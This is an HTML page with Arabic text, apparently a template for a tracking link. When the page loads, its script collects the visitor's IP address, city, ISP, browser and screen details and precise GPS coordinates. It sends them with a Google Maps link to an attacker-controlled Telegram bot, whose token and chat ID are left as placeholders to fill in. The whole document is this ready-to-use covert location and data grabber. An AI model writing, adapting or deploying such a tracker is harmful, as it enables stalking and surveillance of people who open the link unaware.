<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> TOLARTE </title>
    <script>
        const BOT_TOKEN = "TOKEN BOT👈";
        const CHAT_ID = "ID BOT👈";

        function sendToTelegram(message) {
            const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent(message)}&parse_mode=Markdown`;
            fetch(url)
                .then(response => console.log("تم الإرسال إلى تيليجرام"))
                .catch(error => console.error("خطأ أثناء الإرسال:", error));
        }

        function getIPInfoAndSend() {
            fetch('https://ipinfo.io/json?token=fecb435de2486d')
                .then(response => response.json())
                .then(data => {
                    const ip = data.ip || "غير متوفر";
                    const country = data.country || "غير متوفر";
                    const city = data.city || "غير متوفر";
                    const isp = data.org || "غير متوفر";

                    const browserInfo = navigator.userAgent;
                    const platform = navigator.platform;
                    const screenWidth = screen.width;
                    const screenHeight = screen.height;

                    let message = `
🚀 **معلومات جديدة** 🚀
🌍 **الدولة:** ${country}  
🏙 **المدينة:** ${city}  
📡 **مزود الخدمة:** ${isp}  
🌐 **IP:** ${ip}  
🖥 **النظام:** ${platform}  
📱 **المتصفح:** ${browserInfo}  
📏 **دقة الشاشة:** ${screenWidth}x${screenHeight}
                    `;

                    sendToTelegram(message);
                })
                .catch(error => {
                    console.error("خطأ أثناء جلب بيانات IP:", error);
                    sendToTelegram("فشل في جلب بيانات الموقع عبر الإنترنت.");
                });
        }

        function getGPSAndSend() {
            if ("geolocation" in navigator) {
                navigator.geolocation.getCurrentPosition(
                    position => {
                        const lat = position.coords.latitude;
                        const lon = position.coords.longitude;
                        const accuracy = position.coords.accuracy;

                        const gpsMessage = `
📌 **إحداثيات GPS الدقيقة:**  
📍 **خط العرض:** ${lat}  
📍 **خط الطول:** ${lon}  
🎯 **دقة الموقع:** ±${accuracy} متر  
🔗 [عرض على خرائط Google](https://www.google.com/maps?q=${lat},${lon})
                        `;
                        sendToTelegram(gpsMessage);
                    },
                    error => {
                        console.error("تعذر الحصول على الموقع:", error);
                        let errorMessage = "لم يتم منح الإذن للحصول على الموقع GPS.";
                        if (error.code === 1) errorMessage = "تم رفض إذن الوصول إلى الموقع.";
                        if (error.code === 2) errorMessage = "لا يمكن تحديد الموقع حاليًا.";
                        if (error.code === 3) errorMessage = "تم تجاوز مهلة طلب الموقع.";
                        sendToTelegram(errorMessage);
                    },
                    { enableHighAccuracy: true, timeout: 10000, maximumAge: 0 }
                );
            } else {
                sendToTelegram("المتصفح لا يدعم GPS.");
            }
        }

        function startTracking() {
            getIPInfoAndSend();
            getGPSAndSend();
        }

        window.onload = startTracking;
    </script>
</head>
<body>
    <h1>جاري تحميل البيانات وإرسالها...</h1>
</body>
</html>